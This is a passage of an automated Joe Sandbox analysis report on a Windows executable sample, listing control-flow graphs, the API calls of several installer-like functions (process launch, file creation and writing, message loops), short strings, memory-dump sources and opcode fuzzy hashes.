7ff6ca9ef742-7ff6ca9ef74f ShellExecuteExW 2014->2041 2042 7ff6ca9ef6ef-7ff6ca9ef73d call 7ff6ca9f797c call 7ff6ca9c129c call 7ff6ca9d5b60 call 7ff6ca9c1fa0 2014->2042 2015->2009 2023 7ff6ca9ef618-7ff6ca9ef622 2015->2023 2016->2015 2017->2018 2024 7ff6ca9ef8de-7ff6ca9ef8e6 2018->2024 2025 7ff6ca9ef8cd-7ff6ca9ef8d4 2018->2025 2019->2005 2026 7ff6ca9ef5d4-7ff6ca9ef5db 2019->2026 2020->2019 2023->1992 2023->1993 2031 7ff6ca9ef8eb-7ff6ca9ef8f6 2024->2031 2032 7ff6ca9ef8e8 2024->2032 2029 7ff6ca9ef8d9 2025->2029 2030 7ff6ca9ef8d6 2025->2030 2033 7ff6ca9ef5e0 2026->2033 2034 7ff6ca9ef5dd 2026->2034 2029->2024 2030->2029 2031->1994 2032->2031 2033->1999 2034->2033 2043 7ff6ca9ef755-7ff6ca9ef75f 2041->2043 2044 7ff6ca9ef846-7ff6ca9ef84e 2041->2044 2042->2041 2046 7ff6ca9ef761-7ff6ca9ef764 2043->2046 2047 7ff6ca9ef76f-7ff6ca9ef772 2043->2047 2048 7ff6ca9ef882-7ff6ca9ef88f 2044->2048 2049 7ff6ca9ef850-7ff6ca9ef866 2044->2049 2046->2047 2051 7ff6ca9ef766-7ff6ca9ef76d 2046->2051 2052 7ff6ca9ef774-7ff6ca9ef77f IsWindowVisible 2047->2052 2053 7ff6ca9ef78e-7ff6ca9ef7a1 WaitForInputIdle call 7ff6ca9efe24 2047->2053 2048->1975 2054 7ff6ca9ef87d call 7ff6ca9f220c 2049->2054 2055 7ff6ca9ef868-7ff6ca9ef87b 2049->2055 2051->2047 2059 7ff6ca9ef7e3-7ff6ca9ef7f0 CloseHandle 2051->2059 2052->2053 2060 7ff6ca9ef781-7ff6ca9ef78c ShowWindow 2052->2060 2067 7ff6ca9ef7a6-7ff6ca9ef7ad 2053->2067 2054->2048 2055->2054 2062 7ff6ca9ef8fb-7ff6ca9ef903 call 7ff6ca9f7904 2055->2062 2065 7ff6ca9ef805-7ff6ca9ef80c 2059->2065 2066 7ff6ca9ef7f2-7ff6ca9ef803 call 7ff6ca9e13c4 2059->2066 2060->2053 2071 7ff6ca9ef82e-7ff6ca9ef830 2065->2071 2072 7ff6ca9ef80e-7ff6ca9ef811 2065->2072 2066->2065 2066->2071 2067->2059 2073 7ff6ca9ef7af-7ff6ca9ef7b2 2067->2073 2071->2044 2078 7ff6ca9ef832-7ff6ca9ef835 2071->2078 2072->2071 2077 7ff6ca9ef813-7ff6ca9ef828 2072->2077 2073->2059 2074 7ff6ca9ef7b4-7ff6ca9ef7c5 GetExitCodeProcess 2073->2074 2074->2059 2079 7ff6ca9ef7c7-7ff6ca9ef7dc 2074->2079 2077->2071 2078->2044 2081 7ff6ca9ef837-7ff6ca9ef845 ShowWindow 2078->2081 2079->2059 2081->2044
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                  • String ID: .exe$.inf$Install$p
                                                  • API String ID: 148627002-3607691742
                                                  • Opcode ID: f52464fe41ae4eeaf1096cca7aaec2d6b818bf4fb3230a7d8fb94f8b8e2b6917
                                                  • Instruction ID: cc5c5f229108c148d3e48b7492ab282bee824e4acd601f581cd32281b77c445b
                                                  • Opcode Fuzzy Hash: f52464fe41ae4eeaf1096cca7aaec2d6b818bf4fb3230a7d8fb94f8b8e2b6917
                                                  • Instruction Fuzzy Hash: 4DC1B122F28A4295FB10CF65F9652792371BF88B82F0441B6DA8EC76A7DF3DE5518340
                                                  Function 00007FF6CA9EF0A4 Relevance: 16.6, APIs: 11, Instructions: 102windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                  • String ID:
                                                  • API String ID: 3569833718-0
                                                  • Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                  • Instruction ID: 9c38629799899076cbf99d6ea6366b7a80b8901e3594489e2c3827c1f0685242
                                                  • Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                  • Instruction Fuzzy Hash: CC41E331B1464286F720CFA2F824BA92770FB89B9AF440275DD8E87B95CF3DD4968744
                                                  Function 00007FF6CA9CEF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: 2b7cf89fae77d1b38b76451e9b19ed7b8d05d4ba88469d1939a18fabe5b124cf
                                                  • Instruction ID: 09a18e8bfb09eab51daa59405770c25ac517b5c557c4610c8ec8b3112b2e9bf7
                                                  • Opcode Fuzzy Hash: 2b7cf89fae77d1b38b76451e9b19ed7b8d05d4ba88469d1939a18fabe5b124cf
                                                  • Instruction Fuzzy Hash: 9B12E062F28B4184EB10EF64E4662BD2371EB447A9F504276DA9DD7ADADF3CD186C300
                                                  Function 00007FF6CA9D24C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3556 7ff6ca9d24c0-7ff6ca9d24fb 3557 7ff6ca9d24fd-7ff6ca9d2504 3556->3557 3558 7ff6ca9d2506 3556->3558 3557->3558 3559 7ff6ca9d2509-7ff6ca9d2578 3557->3559 3558->3559 3560 7ff6ca9d257a 3559->3560 3561 7ff6ca9d257d-7ff6ca9d25a8 CreateFileW 3559->3561 3560->3561 3562 7ff6ca9d25ae-7ff6ca9d25de GetLastError call 7ff6ca9d6a0c 3561->3562 3563 7ff6ca9d2688-7ff6ca9d268d 3561->3563 3572 7ff6ca9d25e0-7ff6ca9d262a CreateFileW GetLastError 3562->3572 3573 7ff6ca9d262c 3562->3573 3565 7ff6ca9d2693-7ff6ca9d2697 3563->3565 3566 7ff6ca9d26a5-7ff6ca9d26a9 3565->3566 3567 7ff6ca9d2699-7ff6ca9d269c 3565->3567 3570 7ff6ca9d26cf-7ff6ca9d26e3 3566->3570 3571 7ff6ca9d26ab-7ff6ca9d26af 3566->3571 3567->3566 3569 7ff6ca9d269e 3567->3569 3569->3566 3575 7ff6ca9d26e5-7ff6ca9d26f0 3570->3575 3576 7ff6ca9d270c-7ff6ca9d2735 call 7ff6ca9f2320 3570->3576 3571->3570 3574 7ff6ca9d26b1-7ff6ca9d26c9 SetFileTime 3571->3574 3577 7ff6ca9d2632-7ff6ca9d263a 3572->3577 3573->3577 3574->3570 3578 7ff6ca9d26f2-7ff6ca9d26fa 3575->3578 3579 7ff6ca9d2708 3575->3579 3580 7ff6ca9d2673-7ff6ca9d2686 3577->3580 3581 7ff6ca9d263c-7ff6ca9d2653 3577->3581 3583 7ff6ca9d26ff-7ff6ca9d2703 call 7ff6ca9c20b0 3578->3583 3584 7ff6ca9d26fc 3578->3584 3579->3576 3580->3565 3585 7ff6ca9d2655-7ff6ca9d2668 3581->3585 3586 7ff6ca9d266e call 7ff6ca9f220c 3581->3586 3583->3579 3584->3583 3585->3586 3589 7ff6ca9d2736-7ff6ca9d273b call 7ff6ca9f7904 3585->3589 3586->3580
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3536497005-0
                                                  • Opcode ID: 19081f07b04ed34faab68774849f12bc4f8b326dabedcfb758f4ed5384e6b2c2
                                                  • Instruction ID: b7e9210a45f2448aa2a38e0ec6be28bd49a7c83e243a1c16e2023e49c5776955
                                                  • Opcode Fuzzy Hash: 19081f07b04ed34faab68774849f12bc4f8b326dabedcfb758f4ed5384e6b2c2
                                                  • Instruction Fuzzy Hash: 0D610376E2878185EB208F29F51536E67A1BB847A8F100335DEEA83AD5CF3DD095C704
                                                  Function 00007FF6CA9EFE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                  • String ID:
                                                  • API String ID: 3621893840-0
                                                  • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                  • Instruction ID: 091ea4a0fc28fc76a190629bdc2108dc6864db5f6953b620c0d4b4a8c728fbcc
                                                  • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                  • Instruction Fuzzy Hash: AEF06221B3854682F7208F65F479B362221FFE4B06F841170E98FC2895DE3CE19AC700
                                                  Function 00007FF6CA9EAE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                  • String ID:
                                                  • API String ID: 1266772231-0
                                                  • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                  • Instruction ID: 40060cbf230e37369abf6dae01dcd638545139fb3f77fe6358e7854a32659035
                                                  • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                  • Instruction Fuzzy Hash: 7DF03C32A3854282FB609F61F8A9A366361BFE0B06F845175E98EC2864DF3CD159CB00
                                                  Function 00007FF6CA9E91E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                  • String ID: EDIT
                                                  • API String ID: 4243998846-3080729518
                                                  • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                  • Instruction ID: 0e65a09ec380874c5683a07ed293d36cecd564cba0e1c6c750dd9419616cc192
                                                  • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                  • Instruction Fuzzy Hash: 03016261B28A8781FE309F62B8357F563A0BFA8742F441171C98DC7796DE3CD14A8640
                                                  Function 00007FF6CA9D2CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3905 7ff6ca9d2ce0-7ff6ca9d2d0a 3906 7ff6ca9d2d13-7ff6ca9d2d1b 3905->3906 3907 7ff6ca9d2d0c-7ff6ca9d2d0e 3905->3907 3909 7ff6ca9d2d2b 3906->3909 3910 7ff6ca9d2d1d-7ff6ca9d2d28 GetStdHandle 3906->3910 3908 7ff6ca9d2ea9-7ff6ca9d2ec4 call 7ff6ca9f2320 3907->3908 3912 7ff6ca9d2d31-7ff6ca9d2d3d 3909->3912 3910->3909 3914 7ff6ca9d2d3f-7ff6ca9d2d44 3912->3914 3915 7ff6ca9d2d86-7ff6ca9d2da2 WriteFile 3912->3915 3917 7ff6ca9d2daf-7ff6ca9d2db3 3914->3917 3918 7ff6ca9d2d46-7ff6ca9d2d7a WriteFile 3914->3918 3916 7ff6ca9d2da6-7ff6ca9d2da9 3915->3916 3916->3917 3919 7ff6ca9d2ea2-7ff6ca9d2ea6 3916->3919 3917->3919 3920 7ff6ca9d2db9-7ff6ca9d2dbd 3917->3920 3918->3916 3921 7ff6ca9d2d7c-7ff6ca9d2d82 3918->3921 3919->3908 3920->3919 3922 7ff6ca9d2dc3-7ff6ca9d2dd8 call 7ff6ca9cb4f8 3920->3922 3921->3918 3923 7ff6ca9d2d84 3921->3923 3926 7ff6ca9d2e1e-7ff6ca9d2e6d call 7ff6ca9f797c call 7ff6ca9c129c call 7ff6ca9cbca8 3922->3926 3927 7ff6ca9d2dda-7ff6ca9d2de1 3922->3927 3923->3916 3926->3919 3938 7ff6ca9d2e6f-7ff6ca9d2e86 3926->3938 3927->3912 3928 7ff6ca9d2de7-7ff6ca9d2de9 3927->3928 3928->3912 3931 7ff6ca9d2def-7ff6ca9d2e19 3928->3931 3931->3912 3939 7ff6ca9d2e9d call 7ff6ca9f220c 3938->3939 3940 7ff6ca9d2e88-7ff6ca9d2e9b 3938->3940 3939->3919 3940->3939 3941 7ff6ca9d2ec5-7ff6ca9d2ecb call 7ff6ca9f7904 3940->3941
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$Handle
                                                  • String ID:
                                                  • API String ID: 4209713984-0
                                                  • Opcode ID: 80d679962d8da8723b1dfdab07288302c85f97641ab732a3254a9a7b380aa9c3
                                                  • Instruction ID: 5223c8bc03cc8a66b5ba02cadcbde7cc93095422f09b9a3313da4b1b2ea42f6a
                                                  • Opcode Fuzzy Hash: 80d679962d8da8723b1dfdab07288302c85f97641ab732a3254a9a7b380aa9c3
                                                  • Instruction Fuzzy Hash: 86510432F28A4282EA548F65F86577A2360FF85B96F500175EA8EC7A91DF3CE485C301
                                                  Function 00007FF6CA9F03E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                  • String ID:
                                                  • API String ID: 2912839123-0
                                                  • Opcode ID: 73c4619bd526a1d3b5b9f86a2789d57be5191b4473294d51ed7611d72a7fb088
                                                  • Instruction ID: 5f00614ef306dfa511f66c2579453fabd831a1bfb28243573180fa638d857258
                                                  • Opcode Fuzzy Hash: 73c4619bd526a1d3b5b9f86a2789d57be5191b4473294d51ed7611d72a7fb088
                                                  • Instruction Fuzzy Hash: 1651B362F2465284FF009FA5E8662AD2336AF45B95F400279EA9CD7BD7EF6CD141C300
                                                  Function 00007FF6CA9F2D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 1452418845-0
                                                  • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                  • Instruction ID: 761c925fcfdfebd8e9b4245ab2d3387d6e82e41e5da62bed7bf482ade5efade0
                                                  • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                  • Instruction Fuzzy Hash: F4313011E2D24342FA54AF64BC773BA22919F44386F5454BCF9DECB2D7DE2CB4068246
                                                  Function 00007FF6CA9D3684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2359106489-0
                                                  • Opcode ID: 25b09b08149b20c8b4e07bd85b1a81093c04adcd4e8e53ff44e467d12699f09b
                                                  • Instruction ID: ae8533ee304b1d2ed970e65aa9794fa928fc5436bc141d0d6c6e3eab37e63189
                                                  • Opcode Fuzzy Hash: 25b09b08149b20c8b4e07bd85b1a81093c04adcd4e8e53ff44e467d12699f09b
                                                  • Instruction Fuzzy Hash: FF31C662E2CA8281EA609F25B46627A6351FF88793F544271EEDDC36D6DF3CD4C5C600
                                                  Function 00007FF6CA9D2320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$FileHandleRead
                                                  • String ID:
                                                  • API String ID: 2244327787-0
                                                  • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                  • Instruction ID: 4166af63c82f55c3a426a860533557229e6bbd06d2a3f22b9c7c72628efd845d
                                                  • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                  • Instruction Fuzzy Hash: DA219231E2CA8281EA645F11B42523DA3A0FB45F96F1445B0DADDC7686CF7CD8C5C712
                                                  Function 00007FF6CA9DE948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9DECD8: ResetEvent.KERNEL32 ref: 00007FF6CA9DECF1
                                                    • Part of subcall function 00007FF6CA9DECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6CA9DED07
                                                  • ReleaseSemaphore.KERNEL32 ref: 00007FF6CA9DE974
                                                  • CloseHandle.KERNELBASE ref: 00007FF6CA9DE993
                                                  • DeleteCriticalSection.KERNEL32 ref: 00007FF6CA9DE9AA
                                                  • CloseHandle.KERNEL32 ref: 00007FF6CA9DE9B7
